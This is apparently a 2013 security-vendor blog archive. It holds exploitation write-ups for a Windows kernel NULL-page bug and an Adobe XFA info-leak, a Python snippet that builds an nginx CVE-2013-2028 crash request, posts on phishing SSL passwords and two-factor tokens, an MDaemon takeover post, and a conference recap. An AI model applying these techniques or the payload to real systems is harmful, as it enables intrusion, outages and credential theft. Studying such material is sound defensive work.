Monday, November 4, 2013

Exploiting CVE-2013-3881: A Win32k NULL Page Vulnerability

Microsoft Security Bulletin MS13-081 announced an elevation of privilege vulnerability []. Several days later Endgame published [] some further details on the vulnerability in question but did not provide full exploitation details. In this post we will discuss how to successfully exploit CVE-2013-3881.

The Vulnerability

The vulnerability resides in xxxTrackPopupMenuEx, the function responsible for displaying shortcut menus and tracking user selections. During this process it tries to get a reference to the GlobalMenuState object via a call to xxxMNAllocMenuState; if the object is already in use, for example when another pop-up menu is active, this function will try to create a new instance.

If xxxMNAllocMenuState fails it will return False but it will also set the pGlobalMenuState thread global variable to NULL. The caller verifies the return value, and in case of failure it will try to do some cleanup in order to fail gracefully.

During this cleanup the xxxEndMenuState procedure is called. This function's main responsibility is to free and unlock all the resources acquired and saved for the MenuState object, but it does not check that the pGlobalMenuState variable is not NULL before using it. As a result, a series of kernel operations is performed on a kernel object whose address is zero, and which is thus potentially controlled from userland memory on platforms that allow mapping that page.

Triggering the vulnerability is relatively easy by just creating and displaying two popup instances and exhausting GDI objects for the current session, as explained by Endgame. However, actually getting code execution is not trivial.


Usually a NULL dereference vulnerability in the kernel can be exploited by mapping memory at address zero in userland (when the OS allows it), creating a fake object inside this null page, and then triggering the vulnerability in the kernel from the context of the exploit process, which has the null page mapped with attacker-controlled data. With some luck, a function pointer of some sort gets called from our controlled object data and we achieve code execution with kernel privileges (this was the case with MS11-054, for example). As such, NULL dereference vulnerabilities have for many years provided a simple and straightforward route to kernel exploitation and privilege escalation in scenarios where you are allowed to map at zero.

Unfortunately, in the case of CVE-2013-3881 life is not that simple, even on platforms that allow the null page to be allocated.

When xxxTrackPopupMenuEx calls xxxMNAllocMenuState and it fails, it jumps directly to destroying the (non-existent) MenuState object, and after some function calls it will inevitably try to free the memory. This means it does not matter whether we create a perfectly valid object at address zero: at some point before xxxEndMenuState returns, a call to ExFreePoolWithTag(0x0, tag) will be made. This call produces a system crash, because the pool headers it tries to access are normally located just before the allocation address, which in this case is address 0. The kernel therefore fetches at zero minus something, which is unallocated and/or uncontrolled memory, and we trigger a BSOD.

This means the only viable exploitation option is to try to get code execution before this free occurs.

Situational Awareness

At this point we try to understand the entire behavior of xxxEndMenuState, and all of the structures and objects being manipulated before we trigger any fatal crash. The main structure we have to deal with is the one that is being read from address zero, which is referenced from the pGlobalMenuState variable:

+0x000 pGlobalPopupMenu : Ptr32 tagPOPUPMENU
+0x004 fMenuStarted : Pos 0, 1 Bit
+0x004 fIsSysMenu : Pos 1, 1 Bit
+0x004 fInsideMenuLoop : Pos 2, 1 Bit
+0x004 fButtonDown : Pos 3, 1 Bit
+0x004 fInEndMenu : Pos 4, 1 Bit
+0x004 fUnderline : Pos 5, 1 Bit
+0x004 fButtonAlwaysDown : Pos 6, 1 Bit
+0x004 fDragging : Pos 7, 1 Bit
+0x004 fModelessMenu : Pos 8, 1 Bit
+0x004 fInCallHandleMenuMessages : Pos 9, 1 Bit
+0x004 fDragAndDrop : Pos 10, 1 Bit
+0x004 fAutoDismiss : Pos 11, 1 Bit
+0x004 fAboutToAutoDismiss : Pos 12, 1 Bit
+0x004 fIgnoreButtonUp : Pos 13, 1 Bit
+0x004 fMouseOffMenu : Pos 14, 1 Bit
+0x004 fInDoDragDrop : Pos 15, 1 Bit
+0x004 fActiveNoForeground : Pos 16, 1 Bit
+0x004 fNotifyByPos : Pos 17, 1 Bit
+0x004 fSetCapture : Pos 18, 1 Bit
+0x004 iAniDropDir : Pos 19, 5 Bits
+0x008 ptMouseLast : tagPOINT
+0x010 mnFocus : Int4B
+0x014 cmdLast : Int4B
+0x018 ptiMenuStateOwner : Ptr32 tagTHREADINFO
+0x01c dwLockCount : Uint4B
+0x020 pmnsPrev : Ptr32 tagMENUSTATE
+0x024 ptButtonDown : tagPOINT
+0x02c uButtonDownHitArea : Uint4B
+0x030 uButtonDownIndex : Uint4B
+0x034 vkButtonDown : Int4B
+0x038 uDraggingHitArea : Uint4B
+0x03c uDraggingIndex : Uint4B
+0x040 uDraggingFlags : Uint4B
+0x044 hdcWndAni : Ptr32 HDC__
+0x048 dwAniStartTime : Uint4B
+0x04c ixAni : Int4B
+0x050 iyAni : Int4B
+0x054 cxAni : Int4B
+0x058 cyAni : Int4B
+0x05c hbmAni : Ptr32 HBITMAP__
+0x060 hdcAni : Ptr32 HDC__

This is the main object xxxEndMenuState deals with: it performs a couple of actions using the object and finally attempts to free it with the call to ExFreePoolWithTag. The interactions with the object that occur prior to the free are the ones we have to analyze deeply, as they are our only hope of getting code execution before the imminent crash.

xxxEndMenuState is a destructor, and as such it first calls the destructor of each of the objects contained inside the main object before actually freeing their associated memory.


The _MNFreePopup call is very interesting: PopupMenu objects contain several WND objects, and these hold handle references. This is relevant because if a WND object has a lock count equal to one when _MNFreePopup is called, at some point it will try to destroy the object that the handle is referencing. These objects are global to a user session. This means that we can force the deletion of any object within the current Windows session, or at the very least decrement its reference count.

+0x000 fIsMenuBar : Pos 0, 1 Bit
+0x000 fHasMenuBar : Pos 1, 1 Bit
+0x000 fIsSysMenu : Pos 2, 1 Bit
+0x000 fIsTrackPopup : Pos 3, 1 Bit
+0x000 fDroppedLeft : Pos 4, 1 Bit
+0x000 fHierarchyDropped : Pos 5, 1 Bit
+0x000 fRightButton : Pos 6, 1 Bit
+0x000 fToggle : Pos 7, 1 Bit
+0x000 fSynchronous : Pos 8, 1 Bit
+0x000 fFirstClick : Pos 9, 1 Bit
+0x000 fDropNextPopup : Pos 10, 1 Bit
+0x000 fNoNotify : Pos 11, 1 Bit
+0x000 fAboutToHide : Pos 12, 1 Bit
+0x000 fShowTimer : Pos 13, 1 Bit
+0x000 fHideTimer : Pos 14, 1 Bit
+0x000 fDestroyed : Pos 15, 1 Bit
+0x000 fDelayedFree : Pos 16, 1 Bit
+0x000 fFlushDelayedFree : Pos 17, 1 Bit
+0x000 fFreed : Pos 18, 1 Bit
+0x000 fInCancel : Pos 19, 1 Bit
+0x000 fTrackMouseEvent : Pos 20, 1 Bit
+0x000 fSendUninit : Pos 21, 1 Bit
+0x000 fRtoL : Pos 22, 1 Bit
+0x000 iDropDir : Pos 23, 5 Bits
+0x000 fUseMonitorRect : Pos 28, 1 Bit
+0x004 spwndNotify : Ptr32 tagWND
+0x008 spwndPopupMenu : Ptr32 tagWND
+0x00c spwndNextPopup : Ptr32 tagWND
+0x010 spwndPrevPopup : Ptr32 tagWND
+0x014 spmenu : Ptr32 tagMENU
+0x018 spmenuAlternate : Ptr32 tagMENU
+0x01c spwndActivePopup : Ptr32 tagWND
+0x020 ppopupmenuRoot : Ptr32 tagPOPUPMENU
+0x024 ppmDelayedFree : Ptr32 tagPOPUPMENU
+0x028 posSelectedItem : Uint4B
+0x02c posDropped : Uint4B

In order to understand why this is so useful, let's analyze what happens when a WND object is destroyed:

pWND __stdcall HMUnlockObject(pWND pWndObject)
{
    pWND result = pWndObject;

    if (!--pWndObject->cLockObj)
        result = HMUnlockObjectInternal(pWndObject);
    return result;
}

The first thing done is a decrement of the cLockObj counter, and if the counter is then zero the function HMUnlockObjectInternal is called.

pWND __stdcall HMUnlockObjectInternal(pWND pWndObject)
{
    pWND result = pWndObject;
    unsigned int entryIndex;
    pHandleEntry entry;

    entryIndex = pWndObject->handle & 0xFFFF;
    entry = gSharedInfo.aheList + gSharedInfo.HeEntrySize * entryIndex;

    if ((entry->bFlags & HANDLEF_DESTROY) && !(entry->bFlags & HANDLEF_INDESTROY))
        result = HMDestroyUnlockedObject(entry);
    return result;
}

Once it knows that the reference count has reached zero, it has to actually destroy the object. For this task it takes the handle value and applies a mask to obtain the index of the HandleEntry in the handle table.
It then validates some state flags and calls HMDestroyUnlockedObject.
The HandleEntry contains information about the object's type and state. This information is used to select between the different destructor functions.

int __stdcall HMDestroyUnlockedObject(pHandleEntry handleEntry)
{
    int index;

    index = 0xC * handleEntry->bType;   /* gahti entries are 0xC bytes */
    handleEntry->bFlags |= HANDLEF_INDESTROY;

    return (*(FnDestroy *)((char *)gahti + index))(handleEntry->phead);
}


The handle type information table (gahti) holds properties specific to each object type, as well as their Destroy functions. So this function will use the bType value from the handleEntry in order to determine which Destroy function to call.

At this point it is important to remember that we have full control over the MenuState object, and that means we can create and fully control its inner PopupMenu object, and in turn the WND objects inside this PopupMenu. This implies that we have control over the handle value in the WND object.

Another important fact is that entry zero on the gahti table is always zero, and it represents the FREE object type.

So our strategy for getting code execution is to, by some means, create an object whose HandleEntry in the handle table has bType = 0x0 and bFlags = 0x1. If we can manage to do so, we can then create a fake WND object with a handle that references this object of bType = 0x0. When HMDestroyUnlockedObject is called it will end up in a call to gahti[0x0], and as the first element in the gahti table is zero, this ends up as a "call 0". In other words, we can force a path that will execute our controlled data at address zero.

What we need

We need to create a user object of bType=FREE (0x0) and bFlags= HANDLEF_DESTROY (0x1).
This is not possible directly, so we first focus on getting an object with its bFlags value equal to 0x1. For this purpose we create a Menu object, set it on a window, and then destroy it. The internal reference count of the object does not reach zero because it is still referenced by the window object, so it is not actually deleted but instead flagged as HANDLEF_DESTROY in its HandleEntry. This means bFlags will equal 0x1.

The bType value is directly associated with the object type. In the case of a menu object the value is 0x2, and there is no way to create an object of type 0x0. So we focus on the ways we have to alter this value using some of the functions called before the WND object is destroyed.

As you may remember from the PopupMenu structure shown before, it contains several WND objects, and one of the first actions performed when HMUnlockObject(pWnd) is called is decrementing the lock count. So we simply set up two fake WND objects in such a way that the lockCount field points at the HandleEntry->bType field of our menu object. When each of those fake WND objects is destroyed, it actually performs a "dec" operation on the bType of our menu object, decrementing it from 0x2 to 0x0. We now have bFlags of 0x1 and bType of 0x0.

Using this little trick we are able to create a User object with the needed values on the HandleEntry.


First we will create a MenuObject and force it to be flagged as HANDLEF_DESTROY.

Then we trigger the vulnerability: xxxEndMenuState will get a reference to the MenuState structure from a global thread pointer whose value is now zero. So we map this address and create a fake MenuState structure at zero.

xxxEndMenuState will call _MNFreePopup(..) on a popup object instance we created, which will in turn try to destroy its internal objects. Three of these objects are fake WND objects which we also create. The first two serve the purpose of decrementing the bType value of our menu object, and the third one triggers HMDestroyUnlockedObject on that same object. This results in code execution being redirected to address 0x0, as previously discussed.

We have to remember that when we redirect execution to address 0, this memory also serves as the MenuState object. In particular, the first field is a pointer to the PopupMenu object that we need to use. So what we do is choose the address of this popup menu object in such a way that the least significant bytes of the address also represent a valid x86 jump opcode (e.g. 0x04eb is stored as eb 04 in little-endian memory ordering, which is a short jump over the next 4 bytes).

Finish him!

Once we achieve execution at ring 0, we patch the Enabled field of the _SEP_TOKEN_PRIVILEGES structure of the MOSDEF callback process in order to enable all privileges for the process. We fix up the HandleEntry we modified before, and restore the stack so execution returns after the pool free, thus skipping the BSOD.

Once all of this is done we return to user-land, but now our MOSDEF process has all privileges enabled, which allows us, for example, to migrate into LSASS and get SYSTEM privileges.

-- Matias Soler

Tuesday, August 6, 2013

Blackhat 2013 -- A Vendor's Perspective

Immunity was a Blackhat sponsor again this year, potentially our last outing for a while. Thanks to everyone who came by our booth! It was fun to meet customers face to face and friends we don't get to see that often.

Things I observed

- Let me define booth babes as someone you short-term hire specifically to work your booth to attract people's attention based on their looks. I only saw one vendor, ironically an educational vendor, who had staff that fit this description.

- I made it a point to talk to some women who came through our booth about booth babes and I found some very different definitions as to what would qualify someone. The most liberal definition was the babe in question could be a full time employee but if they got especially "tarted up" for their booth time then they qualified. By this definition there appeared to be significantly more booth babes in attendance.

- One vendor who put up an enormous booth near the front had, and I'm not kidding, a grandpa doing a magic show. Later their PR person came over and introduced himself scouting for business. I wish I had the presence of mind to ask how that decision happened.

- Did Randy Couture count as a male booth babe or as a celebrity endorsement? If he is a booth babe he's the only one who can easily get me in a rear naked choke, so he's whatever he wants to be.

Things we Learned

- The big buzzword this year was "managed", manage your VPNs, manage your logs, manage your certificates, manage your ssh keys (?!), manage your life!

- Nico and I both walked around and didn't see any new products that blew our minds.

- Immunity went with no dedicated sales staff and I think it worked out well. People were pretty surprised when they talked to someone who knew what was going on with their product. Is it worth taking technical people off of other projects to staff a booth? Regarding reputation I think it probably is; regarding revenue, that remains to be seen.

- I saw a bunch of vendors with six figure booths setting up seating and making people watch movies. I didn't see a lot of butts in seats. What did work surprisingly well was a trivia game the Venafi folks set up where you could win an Apple TV. Every time they did this they had a pretty sizable crowd and they were nice guys to boot.

- When Nico approaches your booth where you're advertising a product to implement "zero day protection" to ask some very pointed questions, that's an intimidating situation. But these folks weren't intimidated. Why? Because they were marketing and sales engineering people who had no idea how their product actually worked to survive any level of professional scrutiny.

- Almost all of the material I demoed for SWARM was stuff I found the day before the sponsor hall opened. David A. and I put in a crap ton of work getting the SWARM set up working in a laptop powered VM but not so much on what we were going to show. It created the opportunity to find something new in our dataset and get excited about it which made a really effective demo.

- We had a bunch of grumpy old men approach our booth this year. They all seemed to respond well to me giving it right back to them. Perhaps a winning strategy?

- I saw folks throwing out some guesses about the number of women present. I saw 1:15 through 1:30, I wasn't keeping count (that would be creepy) but it seemed like more than last year. I chatted with @Tardissauce a bit about this at hackcup. Her thought was that Blackhat tends to attract attendees higher up the corporate ladder than DefCon, there are more women in these positions now and therefore that ratio is going to start to even out. It's odd since the talks are normally highly technical. It is the rare manager who can appreciate a talk on double-fetch bugs in the Windows Kernel.

Booth stuff

- Investing in carpet and padding underneath is completely worth it, my knees and feet were saved

- If you're going to buy labor, buy tear down labor rather than setup labor. You'll want to get your booth set up just the way you want it initially but by the end of the conference you're so tired you just want someone else to pack everything up. We waited 3.5 hours for our pallet and supplies to come to our booth at the end of the conference. Things got weird.

- In our 3.5 hours of time I did a lot of walking around the vendor hall as it was being packed up. I counted about 5 servers or devices I could've made off with without anyone being the wiser. If you're bringing that type of gear secure it yourself before tear down.

- I think our booth looked pretty good but we did have a lot of people asking us "so what do you guys do?" If we were going to do something like this again we'd want to put some kind of sign up like: "Pen-Testing Tools for Professionals". It was pretty liberating to repeatedly tell people that I didn't give a toss about configuring a firewall though.

- Invest in shirts that are not black. Everyone wore black shirts.

- I can almost guarantee your sales slicks are too wordy. I ain't reading a white paper here.

- There needs to be a medical reason for you to wear sunglasses at your booth, which is inside.

Vendor Freebies

- Best Overall: Again Qualys wins with their red freebie bag. As soon as you walked in the vendor hall you saw Qualys' booth and had the opportunity to get a reasonable quality bag for all your freebies. Everyone had one and everyone put all the other vendor freebies into their Qualys bag, reducing the exposure of other vendors and limiting the impact of their marketing investment. WELL PLAYED QUALYS >:[

- Best Shirt: Spider Labs' mall-airbrush-kiosk style graffiti on a bright orange shirt
- Shirt Runner-Up: Splunk "Taking the sh out of it"
- Shirt honorable mention: Core Security, faux-tux shirt

- Worst Overall: I didn't like the light saber thingies at all and no one I talked to about it did either. I guess the hook was that if you took this training it turned you into some kind of hacking Jedi? Brotip: if you're turning people into Jedis you should at least be able to talk about your syllabus without referring people directly to your website :P

Shameless plugs

You can read my 2012 vendor perspective blog post here.

Monday, June 24, 2013

Adobe XFA exploits for all! First Part: The Info-leak

Some notes on exploit development

There are two types of frustration you face as an exploit developer when working from a piece of malware carrying a zero day or from a public proof of concept, and they generally kick in within the first day or two.

The first one is a classic: spending hours navigating the darkest corners of the Internet looking for the right trial version of the vulnerable application. The more obscure the software, the harder a time you will have; I know dumb stack overflows where finding the server took more time than exploiting it.

Luckily, this was not our case since we are exploiting Adobe Reader and you can easily find all the versions.

The second problem, and the most common one while reversing Chinese malware, is the low success rate these exploits often have. You are able to crash the vulnerable software, of course, and in our line of business that is generally enough to demonstrate the weakness. But you also want to understand what techniques they use to gain control and compare them against yours, and that requires their exploit to actually work.

In the case of the AcroForm XFA bug, no matter how much we tried with different environments and versions, the heap layout was never massaged correctly enough to allow the exploit to work.

This leaves an open question we often ponder (and we have so many theories... yes, some of them involve aliens!): why are the Chinese offensive teams not investing a couple more weeks on the heap layout, like we did, to dramatically improve the reliability of their exploits?

In malware design, reliability == more computers owned == more money.

At the same time, from an OPSEC perspective: reliability == stealthiness. And stealthiness means you don't lose your zero day, so your investment is worth more over the long term.

Technical description

The vulnerability lies in the AcroForm.api module when handling Adobe XFA Forms in a particular way. The exploit uses an XFA form with 1024 fields like this:

We first need to get UI (user interface) objects from the XFA form, and from within the UI objects the choiceList objects. We need to create 2 arrays with these objects:

These arrays will be used during the whole exploitation process. The code in charge of triggering the vulnerability is:

    var node = xfa.resolveNode

    node.oneOfChild = choiceListNodes.pop();

Every time the oneOfChild attribute of a node is set with one of the choiceListNodes nodes, the vulnerability is triggered. When a new "XFAObject" of size 0x40 is created, there is an access outside the bounds of the object at "XFAObject"+44, using uninitialized data. At "XFAObject"+44 there is a pointer to a structure we will describe later. If the pointer is NULL nothing happens, but if we are able to control that uninitialized data after the "XFAObject", we can trigger an info-leak or code execution.

When the pointer is not NULL, a structure like the following one is accessed:
  ----  0x0 Vtable pointer
  |     0x4 RefCount
  --->  0x8 Destructor's address

This structure is accessed twice during the vulnerability trigger. Since we are in control of the RefCount and the "Vtable", if our RefCount is bigger than two we can use the bug as a decrement primitive; otherwise, when the RefCount reaches zero, the object's destructor is called.

We are in control of this memory so we can pretty much control what is going to be executed.
With the right heap layout set, we get a string followed by an object, so with our decrement magic we decrement the string's null terminator and obtain the vtable address right from our object.
Infoleak running on a Windows 7

Sounds simple right? Wrong.

We can read the vtable, but we can only read it correctly if every byte of the vtable is below 0x80. So if any byte is greater than 0x7f, we use the pointer decrement primitive to bring that byte down below 0x80.


This gave us the ability to be version agnostic and follow our mantra: "a hardcode-less exploit is a happy exploit".

At this point, it was time to move on to the second stage of our exploit, which is sandbox bypassing. The Chinese exploit dropped a DLL with its code. We decided that invading the hard drive was bad practice, so with a little help from our Python-based assembler (MOSDEF) embedded in CANVAS we decided to embed the code into the exploit itself.

And so, we decided it was time to bypass the sandbox. But that my friends, will be for our next blogpost entry.

Keep in touch!
David and Enrique

Tuesday, June 18, 2013

Therapeutic Ramblings of a Hacker

You remember your first hack. So do I. It was in the 7th grade and I used the school's computer in the library to erase a fine I had acquired by returning a high school textbook in late.  At first I tried to reason with the librarian saying "The time allocated to read the book should be relative to the size of the book!  I can't read a psychology textbook in the same amount of time as a Dr. Seuss book!".  That didn't work.  So instead I jumped on the library's network and found a way to erase the 25 cent fine from existence.  After I did that I thought to myself "Wow.  That was actually a lot easier than I thought it would be."

Now of course that took place 142 years ago and we all know that security was a lot more 'relaxed' and arguably non-existent 142 years ago.  But has much changed?  The quick and less eloquent answer is 'no'.  Even after billions of dollars are thrown at security issues there are still unauthorized ways into networks and there are still multiple avenues to gain access to sensitive data.  Many times during penetration tests I am still left with the thought "Wow. That was actually a lot easier than I thought it would be." even 176 years after my first 'hack'.

Anti-virus - doesn't work. It can only protect you against known threats (and by 'known threats' I mean threats that were enjoying high levels of success until anti-virus finally crashed their party - well after the damage has been done).  Anti-virus is just as effective as a man with a shotgun standing in the middle of house with no windows or doors waiting for an intruder - but the shotgun will only fire when a known intruder enters the property - first-time intruders or known intruders that are wearing a different ski mask than the previous robbery get free passes.

Firewalls won't save you.  Sure they have their value and their place but as long as there are computers from the trusted network making requests out into the big bad Interwebs they can't provide the protection you would hope for.  They only reduce the effectiveness of certain types of attacks but do nothing to protect against the type of attack that hackers are using to break in today (and tomorrow, and quite possibly forever).  No software or hardware can stop some humans from being gullible, compassionate or just plain retarded.

There will always be a way in.  There will always be access to your sensitive data.  Think of it this way - can a physical safe ever be 100% burglar proof?  No.  Why?  Because it has to be designed to give someone access.  The only way to keep a physical safe 100% burglar proof would be to design it in such a way that it would never open after it was shut for the first time.  That design can't be applied to us in our society because we want access to our data. Correction, we DEMAND access to our data. If we have pathways to our data then other people have pathways to our data.  As long as you let people through your doors, grant access to anyone on your network or let code run on your devices there will always be a way in.  Our job as security professionals is just to find the pathways and reduce them to a reasonable quantity and find ways to manage risk and in so doing make it really expensive or time consuming for unauthorized persons to traverse those paths.

Everyone is vulnerable. It's rare to find people that aren't broadcasting every second of their lives to the world via social media.  I know what my girlfriend from high school had for breakfast this morning even though I haven't spoken to her in 74 years.  She even posted a picture of it (it looked delicious). Our data is out there and we are trusting it to be stored in databases that we don't control.  The pathway to enumerating corporate passwords can even start from something as innocent as an Instagram post from a friend of an employee.  Do you know how many entry points there are to your data from the time it starts its journey from your machine (computer, phone, printer, etc) to its final destination? At least 14 trillion.  Well, that was slightly exaggerated, but the point is that it's more than you think.  Don't be surprised when you find that someone has access to your data that you have purposefully sent into someone else's void - because the truth is a lot of someones have access to your data (and it's not just the NSA and PRISM).

Your wireless network is not protected very well (for acceptable definitions of 'protect'). If you don't believe me then your wireless sales guy is really, really good.  In fact most of the protocols that the Internet is built upon weren't designed with security in mind, and wireless networks are no different.  And as I demonstrated in the latest SILICA video an attacker can trick you into invalidating the "S" in IMAPS/SMTPS/POP3S/HTTPS with a simple click of an innocent "OK" button. If the security of your company lies in the hands of your average employee then you are doomed.  The Internet and its wireless little brother are but a castle built on sand and it's raining really hard outside.

You can't fight hackers without hackers.  It's a frame of mind that you need to protect against - not any one specific action.  Buying shiny new security appliances is equivalent to playing a really expensive and never-ending game of whack-a-mole. (Don't get me wrong - removing attack vector #475 might be a good move but hackers will enumerate and exploit the 475-1 remaining vectors soon enough). Don't make the mistake of having security only be an afterthought.

So with that said I leave you this thought.  Hackers are creative, smart and resourceful.  Stop fearing them and hire them.  They should be included in the design phase, implementation phase, testing phase and deployment stages of your new applications, services and strategies.  So give your local hacker a hug and give him/her a lovely corporate gift basket with an invite to your next meeting.  You won't be disappointed with the results.

Thanks for listening to my therapeutic ramblings.  You can send me your ramblings to Twitter @MarkWuergler

Thursday, May 23, 2013

It's SSL Story Time with SILICA

The latest release of SILICA has extended its fake AP service impersonation attacks to support the stealing of passwords from secure protocols such as HTTPS, SMTPS, POP3S, IMAPS and also supports the interception of CRAM-MD5 password hashes in a way that can be easily cracked.

But of course you are thinking to yourself "But Mark, in order for that to work the victim would need to accept a counterfeit SSL certificate before any of the traffic could be decrypted! Of course nobody is going to accept your fake certificate!".  This has led me to believe that some of you would think that the following is a true story:

A guy was driving to a really important meeting (the kind of meeting that would literally change his life for the better) but he noticed a sign on the only road that led to the meeting saying "You probably should not go down this road because someone could be trying to take advantage of you in uncommon and unlikely ways".  So he didn't.  And he missed his meeting.  He won at life.

Now admit that the above scenario would never actually happen, as we are a brave, curious, and sometimes incurably idiotic species, and consider the true outcome of the story above, where he says

"Screw it - I've seen this sign in the past and nothing bad has happened to me.  I'm going to this meeting." and drove to the meeting without a care in the world.

The same is true when presenting a victim with a fake SSL certificate.  MOST ARE GOING TO ACCEPT IT, whether you choose to believe it or not.  In fact, we have calculated a 90% acceptance rate of SILICA's fake SSL certificates (which are generated on-the-fly to appear as legitimate as possible) coming from the domains that are being impersonated.

The truth is that passwords just completely flood into SILICA now from all targeted protocols as if it's a new popular trend. In fact it's borderline ridiculous.  Phones are the worst.  Like a well-trained dog your phone is eager to log in and fetch your daily life and place it at your feet.  This is good for convenience but bad for security.  As soon as an attacker becomes the access point to which your phone automatically connects the attacker almost immediately harvests web site passwords, social networking application passwords and email service passwords.  The following is a screenshot of SILICA stealing passwords (out from under SSL-enabled protocols).

Facebook, Twitter, Hotmail and Gmail account passwords intercepted in SSL traffic during a controlled phishing attack using SILICA.

Here is a practical example of an attack - you open your iPad and you want to check your Gmail account.  So you open your email client like normal but this time you are presented with a popup message that looks like this:

90% of people will click "Continue" to get what they came for and give SILICA the passwords.

If you click "Continue" (which 90% of you will) then SILICA gets the username and password of your  Gmail account.  This is why it doesn't matter if someone clicks "Cancel" - because 90% of the victims have already given up the goods.

SILICA, Two-factor Authentication and Twitter Account Takeover

Phishing is a very effective method of stealing passwords as humans are typically the easiest service to enumerate them from.  I wrote a small extension to SILICA's phishing engine that demonstrates how to successfully take over a Twitter account even when two-factor authentication is enabled.  Hopefully this will help remove the false sense of security that this is the magic solution to prevent account takeovers.

The victim user in this case will log into Twitter as normal, receive an SMS with the legitimate token on the phone associated with the account, and unknowingly give both to SILICA, which displays them in the interface like so:

Using SILICA to successfully phish for a legitimate Twitter two-factor authentication token.

It's that easy.  Two-factor authentication just adds one more step to the entire phishing process.  Keep in mind that two-factor authentication is only meant to mitigate authentication attacks where the attacker has access to the password but not the token - it does nothing to protect the session after successful authentication has taken place.  The new features of SILICA can take advantage of both of these scenarios.  If it can work on Twitter then it can work on the applications that you encounter during your penetration tests.

Also keep in mind that two-factor authentication will not prevent attackers from taking over your account if they are already on your machine, in your browser or on your network.


In reality the Internet does not run on protocols that were built with security in mind.  Security is usually an afterthought after someone takes advantage and a band-aid is needed.  The protocols that you use to get your web traffic and mail are no different.

And what's worse - the protocols that attempt to secure you are still at your mercy - you are given the choice to [sometimes unknowingly] disable all security mechanisms with an innocent looking popup message that just asks you to "Continue" or with an annoying browser warning that says "blah blah maybe you shouldn't click ok blah blah blah NOW CLICK OK TO GET WHAT YOU CAME FOR".


Mark Wuergler
You can bother him here: @MarkWuergler

Jinx Part 2: nginx CVE-2013-2028

Who doesn't love vulnerabilities in web servers? We've written exploits for nginx bugs before and it was a lot of fun. Now Immunity is pleased to release to its CEU customers the 64 bit version of CVE-2013-2028, written up by a new member of the Linux exploit team. Since this exploit affects only recent versions of nginx, and in our experience most modern web servers tend to be 64 bit, we decided to develop against that architecture. This particular exploit is a good example of a modern remote exploit against hard to exploit software. There has been some good analysis of this vulnerability thus far, but as Immunity has a working exploit we thought it worthwhile to chime in.

One of the first hurdles to overcome is not knowing a function's location in memory; ASLR's widespread implementation has made information leak vulnerabilities very valuable. In the absence of an information leak an attacker is left with brute force or another alternative that we'll discuss later. From there it's on to a ROP chain, which may be very dependent on the versions of the libraries available on the system. Complicating all this is the fact that compiling software from scratch on Linux systems is very common; system administrators may pass any number of configuration or compiler options that change things just enough to break exploits that make too many assumptions.

A problem with basing targeting for exploits on pre-compiled binaries that you might get through apt-get or yum is that maintaining a list of targets and offset combinations becomes very cumbersome. And you've got to test against a large cross section of distribution and server version combinations which can be time intensive. When developing the exploit for this vulnerability we decided to make it as universal as possible and find all the memory locations we would need manually. This has the consequence of taking more time to run (5-20 minutes) but the benefit of working out of the box against more environment combinations. You may remember a similar situation with our exploit for Samba's CVE-2012-1182.

With this vulnerability the exploit takes over an nginx worker process (the count is defined in conf/nginx.conf, default 4), and that process will not respond to other normal nginx work while your shell is active, so launching a trojan and getting out of the worker (especially if there aren't many) will help avoid detection. In talking with the developer who wrote this exploit another interesting issue presented itself: there is a condition whereby the target is vulnerable but not exploitable. If the stack canary or the function addresses we use from libc contain bad bytes then exploitation will fail. The worker processes inherit their canaries from the parent, so killing them won't grant you a new canary, and if by some cosmic roll of the dice libc is in a bad location then you're just out of luck. The upshot is that failed exploitation attempts will only kill the worker process and you can try again.

This exploit reuses the socket that established the connection to the web server in the first place. This is very helpful when dealing with hosts that have strict egress filtering, for instance where web servers are not able to initiate outbound connections. So before you upload and execute your trojan to get out of the worker process you'll want to determine what egress filtering (if any) may be in place. If you anticipate strict egress filtering is present then compromising the server during off hours and automating finding an egress port should be part of your game plan. The likelihood of crashing the server or the parent nginx process with this exploit is very low, and we did not observe the case of a worker process getting hung and no longer being available. In our testing we found the exploit reliably gets a shell over 90% of the time. The exploit presents a low risk, high reliability method for getting a shell on an nginx webserver.
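For the curious, the underlying bug lives in nginx's chunked transfer-encoding handling, where an enormous chunk size gets treated as a signed value and later drives an over-long read into a small stack buffer. A hedged, crash-only sketch of the kind of request that tickles it (this is not the CANVAS exploit; the hostname and exact chunk-size string are illustrative):

```python
def build_trigger(host):
    # Chunked request whose absurd chunk size overflows the signed size
    # handling in vulnerable nginx 1.3.9-1.4.0 workers (CVE-2013-2028).
    # Sending this will at most kill a worker, not pop a shell.
    return (
        b"GET / HTTP/1.1\r\n"
        b"Host: " + host.encode() + b"\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n"
        b"f0000000000000000\r\n"   # chunk size parsed into a negative value
        + b"A" * 4096 + b"\r\n"
    )

# Delivery is a plain socket write, e.g.:
#   import socket
#   s = socket.create_connection(("target.example", 80))
#   s.sendall(build_trigger("target.example"))
```

Turning that worker crash into reliable code execution, past the canary and ASLR, is where the real work described above comes in.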

Wednesday, May 22, 2013

An Unusual MDaemon Exploit (a.k.a it's not always about shells)

In penetration testing there is an enormous focus on obtaining shells; and rightly so. Having that level of access to a host, regardless of privilege level, is incredibly useful for an attacker and is usually just the start of a full compromise of a host. Getting a shell can be difficult with all the modern memory corruption protections. Maintaining a shell isn't easy either as you have to contend with all manner of IDS, egress filtering, host monitoring and so forth.

Luckily having a shell isn't the only path to victory. MDaemon is a Windows based mail server (owned by BlackBerry) that is an alternative to Microsoft Exchange; it provides much of the same basic functionality but in a simpler to manage package. Using SWARM we were able to determine that while certainly not as popular as Exchange, MDaemon does have a pretty significant presence. It's not just in the commercial space either - there are government servers in various countries using this software as well.

The new CANVAS exploit takes advantage of a patched vulnerability in several versions of MDaemon that allows account takeover. Since there's not a lot of information on this vulnerability publicly available, that's where I'll leave it - the curious have a low cost method for satisfying their curiosity. Many of the 12.X and below versions are vulnerable, though we have not been able to confirm how far back it goes. Account takeover enables a lot of interesting attacks, such as getting passwords to cloud services like Twitter reset, or social engineering other people in the organization.

We used SWARM to examine the version distribution of MDaemon for over a million IP addresses and I've summarized the results in a table below.

Version Percentage
13.X 12.6%
12.X 21.5%
11.X 20.4%
10.X 21.1%
9.X 17.4%
8.X 2.8%
7.X 2.7%
6.X 1.4%

The results are pretty interesting in a number of respects. Firstly there is a big legacy presence of MDaemon and given some of the disclosures, especially in the web portion, there are many paths to victory. Second - there are some users who just seem unable to ever upgrade their MDaemon. The rough right leaning bell curve shape of the versions is common to almost any server that does not auto update.

Friday, May 3, 2013

How common is common? Exim and Dovecot

